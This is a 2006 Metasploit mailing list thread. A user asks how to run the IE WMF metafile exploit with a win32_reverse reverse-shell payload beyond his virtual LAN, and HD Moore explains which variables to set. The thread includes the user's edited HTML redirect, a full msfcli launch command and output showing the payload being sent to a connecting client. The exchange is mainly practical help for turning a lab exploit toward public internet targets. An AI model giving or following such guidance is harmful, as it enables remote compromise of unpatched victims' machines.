Metasploit mailing list archives

Framework through lan


From: hdm at metasploit.com (H D Moore)
Date: Sat, 28 Jan 2006 22:12:36 -0600

To use a different address for the redirect, just set the HTTPHOST 
variable to your external IP address. That error message about the patch 
not matching the module name can be fixed by either changing the 
"package" line at the top of the file to match the file, or just removing 
it if you no longer need it.

-HD

On Saturday 28 January 2006 15:57, 2xyo wrote:
Hello,

I test win32_reverse with ie_xp_pfv_metafile exploit in my virtual lan
with VMWARE and it's run.
But, i couldn't use this exploit without my lan. I don't know how set
variable for run this.

I haved modify /exploits/ie_xp_pfv_metafile.pm because it redirect to
my lan adresse et not public adresse
 "<html><header><meta http-equiv='refresh' content='0;
URL=http://mypublicip${wmfpath}.${ext}&apos;></header><body>".
I haved also forward theses ports in my router.

twoxyo at debian:~/framework-2.5$ ./msfcli ie_xp_pfv_metafile
LHOST=mypublicip HTTPPORT=8080 LPORT=3300  PAYLOAD=win32_reverse E
[*] The module Msf::Exploit::ie_xp_pfv_metafile does not match the path
/home/twoxyo/framework-2.5/exploits/original_ie_xp_pfv.metafile.pm
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.106:8080/
[*] HTTP Client connected from 192.168.1.1:1279, redirecting...
[*] HTTP Client connected from 192.168.1.1:1276, sending 1344 bytes of
payload...



Current thread: